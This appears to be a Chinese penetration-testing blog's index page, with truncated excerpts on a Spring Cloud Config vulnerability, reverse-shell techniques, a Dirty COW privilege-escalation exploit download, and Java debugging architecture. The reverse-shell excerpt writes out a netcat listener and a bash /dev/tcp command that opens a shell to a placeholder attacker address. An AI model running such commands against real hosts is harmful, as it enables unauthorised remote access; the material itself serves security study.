Brucetg的博客

Spring Cloud ConfigSpring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件，Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。影响版本Spring Cloud Config: 2.2.0 to 2.2.2Spring Cloud Config: 2.1.0 to 2.1.8复现过程https://github.com/spring-cloud/spring-cloud-config/releas

在渗透过程中，在拿到webshell后，如果目标主机是Linux服务器，一般我们都会选择反弹shell以方便后续操作，在此总结下反弹shell的几种姿势。0x01. Bash反弹攻击者主机上执行监听：nc -lvvp port目标主机上执行：bash -i >& /dev/tcp/x.x.x.x/port 0>&1简单解释下：bash ...

该文章首发于： 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521这几天发现90sec需要登录才能浏览文章，为了方便就把该文章也发在个人博客，并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址： https://github.com/Brucetg/DirtyCow-EXP该漏洞是 Linux 内核的内存子...

0x01. Java 调试体系JPDA简介JPDA（Java Platform Debugger Architecture）：即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用JPDA按照抽象层次，又分为三层，分别是：JVM TI（Java VM Tool Interface）：虚拟机对外暴露的接口，包括debug和profile。JDWP（Java ...